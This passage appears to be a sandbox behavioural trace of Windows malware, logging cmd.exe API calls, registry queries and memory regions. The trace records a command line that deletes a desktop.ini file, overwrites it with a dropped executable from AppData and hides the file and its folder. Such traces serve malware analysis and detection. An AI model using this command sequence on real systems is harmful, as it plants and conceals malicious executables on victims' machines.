lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.169] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.169] GetFileType (hFile=0x4c) returned 0x1 [0232.170] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.170] WriteFile (in: hFile=0x4c, lpBuffer=0x16f018*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16f018*, lpNumberOfBytesWritten=0x16e01c*=0x20, lpOverlapped=0x0) returned 1 [0232.170] _get_osfhandle (_FileHandle=4) returned 0x54 
[0232.170] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e008 | out: lpNewFilePointer=0x0) returned 1 [0232.170] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.170] ReadFile (in: hFile=0x54, lpBuffer=0x16ee38, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e028, lpOverlapped=0x0 | out: lpBuffer=0x16ee38*, lpNumberOfBytesRead=0x16e028*=0x200, lpOverlapped=0x0) returned 1 [0232.170] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.170] GetFileType (hFile=0x4c) returned 0x1 [0232.170] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.170] GetFileType (hFile=0x4c) returned 0x1 [0232.170] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.170] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee38*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ee38*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.170] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.170] GetFileType (hFile=0x4c) returned 0x1 [0232.170] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.170] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee88*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ee88*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.170] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.170] GetFileType (hFile=0x4c) returned 0x1 [0232.170] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.170] WriteFile (in: hFile=0x4c, lpBuffer=0x16eed8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16eed8*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.170] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.170] GetFileType (hFile=0x4c) returned 0x1 [0232.170] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.170] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef28*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, 
lpOverlapped=0x0 | out: lpBuffer=0x16ef28*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.170] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.171] GetFileType (hFile=0x4c) returned 0x1 [0232.171] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.171] WriteFile (in: hFile=0x4c, lpBuffer=0x16ef78*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ef78*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.171] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.171] GetFileType (hFile=0x4c) returned 0x1 [0232.171] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.171] WriteFile (in: hFile=0x4c, lpBuffer=0x16efc8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16efc8*, lpNumberOfBytesWritten=0x16e01c*=0x50, lpOverlapped=0x0) returned 1 [0232.171] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.171] GetFileType (hFile=0x4c) returned 0x1 [0232.171] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.171] WriteFile (in: hFile=0x4c, lpBuffer=0x16f018*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16f018*, lpNumberOfBytesWritten=0x16e01c*=0x20, lpOverlapped=0x0) returned 1 [0232.171] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.171] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e008 | out: lpNewFilePointer=0x0) returned 1 [0232.171] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.171] ReadFile (in: hFile=0x54, lpBuffer=0x16ee38, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e028, lpOverlapped=0x0 | out: lpBuffer=0x16ee38*, lpNumberOfBytesRead=0x16e028*=0x32, lpOverlapped=0x0) returned 1 [0232.171] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.171] GetFileType (hFile=0x4c) returned 0x1 [0232.171] _get_osfhandle (_FileHandle=1) returned 0x4c [0232.171] GetFileType (hFile=0x4c) returned 0x1 [0232.171] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0232.171] WriteFile (in: hFile=0x4c, lpBuffer=0x16ee38*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x16e01c, lpOverlapped=0x0 | out: lpBuffer=0x16ee38*, lpNumberOfBytesWritten=0x16e01c*=0x32, lpOverlapped=0x0) returned 1 [0232.171] _get_osfhandle (_FileHandle=4) returned 0x54 [0232.171] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e008 | out: lpNewFilePointer=0x0) returned 1 [0232.172] _close (_FileHandle=4) returned 0 [0232.172] FindNextFileW (in: hFindFile=0x2d0f00, lpFindFileData=0x16f09c | out: lpFindFileData=0x16f09c) returned 0 [0232.173] GetLastError () returned 0x12 [0232.173] FindClose (in: hFindFile=0x2d0f00 | out: hFindFile=0x2d0f00) returned 1 [0232.173] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0232.175] _close (_FileHandle=3) returned 0 [0232.177] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.177] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0232.191] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.191] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0232.193] _get_osfhandle (_FileHandle=0) returned 0x3 [0232.193] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0232.193] SetConsoleInputExeNameW () returned 0x1 [0232.193] GetConsoleOutputCP () returned 0x1b5 [0232.193] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0232.193] SetThreadUILanguage (LangId=0x0) returned 0x409 [0232.193] exit (_Code=0) Process: id = "621" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea169e0" os_pid = "0x9bc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h 
\"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 34485 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 34486 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 34487 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 34488 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 34489 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 34490 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = 
"\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 34491 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 34492 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 34493 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 34494 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 34807 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 34808 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 34809 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 34810 start_va = 0x3a0000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 34811 start_va = 0x650000 end_va = 0x65ffff entry_point = 0x0 region_type = private name = "private_0x0000000000650000" filename = "" Region: id = 34812 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 34813 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = 
"\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 34814 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 34815 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 34816 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 34817 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 34818 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 34819 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 34820 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 34821 start_va = 0x1f0000 end_va = 0x2b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 34822 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 
34823 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 34824 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 34825 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 34826 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 34827 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 34828 start_va = 0x4a0000 end_va = 0x5a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 34829 start_va = 0x660000 end_va = 0x125ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 34830 start_va = 0x1260000 end_va = 0x13c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001260000" filename = "" Region: id = 34855 start_va = 0x13d0000 end_va = 0x169efff entry_point = 0x13d0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 861 os_tid = 0x9ac [0232.536] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1eff34 | out: lpSystemTimeAsFileTime=0x1eff34*(dwLowDateTime=0xbe2816c0, dwHighDateTime=0x1d440a9)) [0232.537] GetCurrentProcessId () returned 0x9bc [0232.537] GetCurrentThreadId () returned 0x9ac [0232.537] GetTickCount () returned 0x3ff73 [0232.537] QueryPerformanceCounter (in: lpPerformanceCount=0x1eff2c | out: 
lpPerformanceCount=0x1eff2c*=28932581496) returned 1 [0232.537] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0232.537] __set_app_type (_Type=0x1) [0232.537] __p__fmode () returned 0x76b331f4 [0232.537] __p__commode () returned 0x76b331fc [0232.538] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0232.538] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0232.538] GetCurrentThreadId () returned 0x9ac [0232.538] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9ac) returned 0x38 [0232.538] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0232.538] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0232.538] SetThreadUILanguage (LangId=0x0) returned 0x409 [0232.564] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0232.564] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1efec4 | out: phkResult=0x1efec4*=0x0) returned 0x2 [0232.564] VirtualQuery (in: lpAddress=0x1efefb, lpBuffer=0x1efe94, dwLength=0x1c | out: lpBuffer=0x1efe94*(BaseAddress=0x1ef000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0232.564] VirtualQuery (in: lpAddress=0xf0000, lpBuffer=0x1efe94, dwLength=0x1c | out: lpBuffer=0x1efe94*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0232.565] VirtualQuery (in: lpAddress=0xf1000, lpBuffer=0x1efe94, dwLength=0x1c | out: lpBuffer=0x1efe94*(BaseAddress=0xf1000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) 
returned 0x1c [0232.565] VirtualQuery (in: lpAddress=0xf3000, lpBuffer=0x1efe94, dwLength=0x1c | out: lpBuffer=0x1efe94*(BaseAddress=0xf3000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0232.565] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x1efe94, dwLength=0x1c | out: lpBuffer=0x1efe94*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0232.565] GetConsoleOutputCP () returned 0x1b5 [0232.566] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0232.566] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0232.566] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.566] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0232.566] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.566] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0232.566] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.566] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0232.566] _get_osfhandle (_FileHandle=0) returned 0x3 [0232.567] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0232.567] _get_osfhandle (_FileHandle=0) returned 0x3 [0232.567] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0232.567] GetEnvironmentStringsW () returned 0x3b06a8* [0232.567] FreeEnvironmentStringsW (penv=0x3b06a8) returned 1 [0232.567] GetEnvironmentStringsW () returned 0x3b06a8* [0232.568] FreeEnvironmentStringsW (penv=0x3b06a8) returned 1 [0232.568] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eee34 | out: phkResult=0x1eee34*=0x40) returned 0x0 [0232.568] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eee3c, 
lpData=0x1eee40, lpcbData=0x1eee38*=0x1000 | out: lpType=0x1eee3c*=0x0, lpData=0x1eee40*=0x50, lpcbData=0x1eee38*=0x1000) returned 0x2 [0232.568] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eee3c, lpData=0x1eee40, lpcbData=0x1eee38*=0x1000 | out: lpType=0x1eee3c*=0x4, lpData=0x1eee40*=0x1, lpcbData=0x1eee38*=0x4) returned 0x0 [0232.568] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eee3c, lpData=0x1eee40, lpcbData=0x1eee38*=0x1000 | out: lpType=0x1eee3c*=0x0, lpData=0x1eee40*=0x1, lpcbData=0x1eee38*=0x1000) returned 0x2 [0232.568] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eee3c, lpData=0x1eee40, lpcbData=0x1eee38*=0x1000 | out: lpType=0x1eee3c*=0x4, lpData=0x1eee40*=0x0, lpcbData=0x1eee38*=0x4) returned 0x0 [0232.568] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eee3c, lpData=0x1eee40, lpcbData=0x1eee38*=0x1000 | out: lpType=0x1eee3c*=0x4, lpData=0x1eee40*=0x40, lpcbData=0x1eee38*=0x4) returned 0x0 [0232.568] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eee3c, lpData=0x1eee40, lpcbData=0x1eee38*=0x1000 | out: lpType=0x1eee3c*=0x4, lpData=0x1eee40*=0x40, lpcbData=0x1eee38*=0x4) returned 0x0 [0232.568] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eee3c, lpData=0x1eee40, lpcbData=0x1eee38*=0x1000 | out: lpType=0x1eee3c*=0x0, lpData=0x1eee40*=0x40, lpcbData=0x1eee38*=0x1000) returned 0x2 [0232.568] RegCloseKey (hKey=0x40) returned 0x0 [0232.568] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eee34 | out: phkResult=0x1eee34*=0x40) returned 0x0 [0232.568] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eee3c, lpData=0x1eee40, lpcbData=0x1eee38*=0x1000 | out: lpType=0x1eee3c*=0x0, 
lpData=0x1eee40*=0x40, lpcbData=0x1eee38*=0x1000) returned 0x2 [0232.568] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eee3c, lpData=0x1eee40, lpcbData=0x1eee38*=0x1000 | out: lpType=0x1eee3c*=0x4, lpData=0x1eee40*=0x1, lpcbData=0x1eee38*=0x4) returned 0x0 [0232.568] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eee3c, lpData=0x1eee40, lpcbData=0x1eee38*=0x1000 | out: lpType=0x1eee3c*=0x0, lpData=0x1eee40*=0x1, lpcbData=0x1eee38*=0x1000) returned 0x2 [0232.568] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eee3c, lpData=0x1eee40, lpcbData=0x1eee38*=0x1000 | out: lpType=0x1eee3c*=0x4, lpData=0x1eee40*=0x0, lpcbData=0x1eee38*=0x4) returned 0x0 [0232.568] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eee3c, lpData=0x1eee40, lpcbData=0x1eee38*=0x1000 | out: lpType=0x1eee3c*=0x4, lpData=0x1eee40*=0x9, lpcbData=0x1eee38*=0x4) returned 0x0 [0232.568] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eee3c, lpData=0x1eee40, lpcbData=0x1eee38*=0x1000 | out: lpType=0x1eee3c*=0x4, lpData=0x1eee40*=0x9, lpcbData=0x1eee38*=0x4) returned 0x0 [0232.568] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eee3c, lpData=0x1eee40, lpcbData=0x1eee38*=0x1000 | out: lpType=0x1eee3c*=0x0, lpData=0x1eee40*=0x9, lpcbData=0x1eee38*=0x1000) returned 0x2 [0232.569] RegCloseKey (hKey=0x40) returned 0x0 [0232.569] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863c0 [0232.569] srand (_Seed=0x5b8863c0) [0232.569] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini\" & type 
\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\"" [0232.569] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\"" [0232.569] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0232.569] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3b06b0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0232.570] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0232.570] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0232.570] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0232.570] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0232.570] _wcsicmp 
(_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0232.570] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0232.570] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0232.570] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0232.570] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0232.570] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0232.570] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0232.570] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0232.570] GetEnvironmentStringsW () returned 0x3b25e0* [0232.570] FreeEnvironmentStringsW (penv=0x3b25e0) returned 1 [0232.570] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0232.570] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0232.570] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0232.570] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 